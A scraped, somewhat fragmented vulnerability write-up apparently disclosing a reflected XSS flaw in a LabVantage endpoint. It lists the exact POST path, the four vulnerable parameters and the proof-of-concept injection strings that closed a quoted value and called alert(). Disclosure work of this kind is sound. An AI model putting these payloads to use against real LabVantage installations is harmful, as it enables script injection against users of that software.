POST /labvantage/rc?command=file&file=WEB-CORE/elements/files/filesembedded.jsp
sdcid
, keyid1
, keyid2
, keyid3
The following steps were used to identify and confirm the reflected XSS vulnerability in the sdcid
, keyid1
, keyid2
, and keyid3
parameters of the POST request to the affected endpoint. The testing was conducted using Burp Suite.
sdcid
: sdcid=SDINote';alert("pwnandpatch-1");'
keyid1
: keyid1=X';alert("pwnandpatch-2");'
keyid2
: keyid2=';alert("pwnandpatch-3");'
keyid3
: keyid3=';alert("pwnandpatch-4");'
Figure 1: The request made by adding XSS payloads to the sdcid
, keyid1
, keyid2
, and keyid3
parameters.
sdcid
Parametersdcid
parameter was sent.pwnandpatch-1
was triggered.Figure 2: The alert appears when the XSS payload is injected into the sdcid
parameter.
keyid1
Parameterkeyid1
parameter was sent.pwnandpatch-2
was triggered.